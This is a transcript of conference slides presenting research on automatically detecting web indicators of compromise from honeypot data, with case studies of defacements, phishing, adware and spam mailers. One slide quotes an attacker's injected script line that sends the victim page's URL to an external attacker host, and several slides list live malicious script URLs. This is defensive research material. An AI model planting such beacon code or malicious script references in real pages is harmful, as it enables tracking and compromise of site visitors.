Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)
-
Upload
marco-balduzzi -
Category
Internet
-
view
1.009 -
download
0
Transcript of Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)
Automatic Extraction of Indicators of Compromise for Web Apps
Dr.-Ing. Marco Balduzzi(with D. Balzarotti and O. Catakoglu @ WWW'16)
29th April 2016RuhrSec, Bochum
2
Who am I?
Sr. Research Scientist @ Trend Micro
Forward-Looking Threat Research (FTR) team
M.Sc. + Ph.D.
UniBG + iSecLab@EURECOM
Hackish and open-source enthusiast since 2002
Established presence in international conferences and committees
3
Indicators of Compromise (IOCs)
Used in incident response and computer forensics
Forensic artifacts
A system has been compromised or infected with malware
For example
Presence in Windows Registry
MD5 file in temporary directory
Unusual outbound network traffic
Log-in irregularities and failures
4
Topic of presentation
Extend the concept of IOCs to Web Applications
(& automatically detect them!)
5
6
7
8
A simple observation
When compromising a web application, attackers often rely on external content / accessory scripts
Are not necessarily per se malicious
Popular Javascript libraries, e.g. jQuery
Beautifiers that control the look&feel of the page, e.g. matrix-style background
Scripts that implement reusable functions, e.g. browsers fingerprinting
Their innocuous form make them “highly resilient” to traditional detection systems (scanners)
9
BUT…
Their presence can be used to precisely pinpoint compromised or harmful pages
(a Web Indicator of Compromise)
10
Example: r57 hacking group
...<head><meta http-equiv="Content-Language" content="en-us"><meta http-equiv="Content-Type" content="text/html;charset=windows-1252"><title>4Ri3 60ndr0n9 was here </title><SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js> </SCRIPT>...
11
Example: r57 hacking group
...<head><meta http-equiv="Content-Language" content="en-us"><meta http-equiv="Content-Type" content="text/html;charset=windows-1252"><title>4Ri3 60ndr0n9 was here </title><SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js></SCRIPT>...
a=new/**/Image();a.src='http://www.r57.gen.tr/r00t/yaz.php?a='+ escape(location.href);
12
13
How do we know that a script is used
in a malicious context ?
i.e. “Is a valid IOC”
14
Data Collection
High-interaction web honeypot [1]
[1] Canali, D., and Balzarotti, D. Behind the scenes of online attacks: an analysis of exploitation behaviors on the web.
15
Extraction of Candidates
Automatically extract candidates from files uploaded and modified by attackers
Focus on JavaScript URLs
Can be applied to other resource types
Normally benign!
E.g., Blocking mouse right-click. Used by attackers to prevent page inspection
Content agnostic (impossible to tell)
Need to extend the analysis to the context
16
Searching the Web for Indicators
Public web pages including references to our indicators
Google did not help :(
Only indexes the content (intext:)
Meanpath.com
HTML/JS source-code support
Coverage of 200 million websites
17
Compromised vs. Benign
Verify that a candidate URL is a valid Indicator
Set of features:
Page Similarity
18
Compromised vs. Benign
Verify that a candidate URL is a valid Indicator
Set of features:
Page Similarity
Maliciousness
19
Compromised vs. Benign
Verify that a candidate URL is a valid Indicator
Set of features:
Page Similarity
Maliciousness
Anomalous Origin
20
Compromised vs. Benign
Verify that a candidate URL is a valid Indicator
Set of features:
Page Similarity
Maliciousness
Anomalous Origin
Component Popularity
21
Compromised vs. Benign
Verify that a candidate URL is a valid Indicator
Set of features:
Page Similarity
Maliciousness
Anomalous Origin
Component Popularity
Security Forums
22
Experiments
Training data: Jan 2015 → April 2015
375 unique candidates (over a total of 2,765)
Population of 1 to 202 (manual vs automated attacks)
Clustering: unsupervised learning (k-means)
Weka framework
3 cluster categories: malicious, benign, undecided
Live experiment: May 2015 → August 2015 (4 months)
Automated detection via analysis framework
23
Live Experiment
303 unique candidates (2.5/day)
Automatically processed and assigned to the closed cluster
22 Benign indicators
96 Malicious indicators
90% were previously unknown or misclassified
¼ IOCs → visual effects: moving text, snow
185 insufficient information (rare scripts)
24
High Lifetime of Malicious Indicators
25
Use of trustworthy code-repositories
10% IOCs hosted on Google Drive/Code!
1 was online for over 2 years!
Last month: used in dozens of defaced websites and drive-by
26
Web Shells
Often deployed by attackers and hidden in defaced websites
Cases of password-protected logins [1]
Flagged as valid indicator
Cases of the r57shell script: feedback of defaced domains
[1] http://www.lionsclubmalviyanagar.com and http://www.wartisan.com
27
Phishing
Common habit
Webmail portals of AOL and Yahoo
Reused the original JS files and hosted on the authoritative domain [1]
IOC included in pages hosted on different domains
Websites compromised by the same group [2]
Correctly classified as malicious indicator
[1] http://snsstatic.aolcdn.com/sns.v14r8/js/fs.js [2] http://www.ucylojistik.com/ and http://fernandanunes.com/
28
VisAdd Adware Campaign
http://4x3zy4qll8bu4n1j.netdnassl.com/res/helper.min.js
Installed on defaced webpages
TDS for affiliate programs
A.Visadd.com malware
Loads the same JS at client-side
600+ new infected users per day
29
Fake Charity Program
http://static.donationtools.org/widgets/FoxyLyrics/widget.js
Loaded via BHO in IE
Vittalia and BrowseFox malware
594 new infections per day
30
Mailers
Compromised sites [1] → SPAM mailing server
Alternative to BHS and botnet-infected machines
Use of Pro Mailer V2: PHP mailer
Copies of jQuery hosted on Google and Tumblr
Unmodified copies of popular libraries. Very likely classified as benign by traditional scanners
Malicious use detected.
[1] http://www.senzadistanza.it/ and http://www.hprgroup.biz/
31
Limitations
Our approach relies on the attacker's deployment strategy and is content agnostic
Evasion techniques:
Inline code
One-time generated URLs
32
Conclusions
Introduced the concept of Web IOCs
Leveraged a honeypot for real-time identification
Benign content → undetected by traditional scanners
Use 'HTTP Referer' to discover compromises pages
By the same hacking group?
33
Thank you!
Dr.-Ing. Marco Balduzzi
@embyte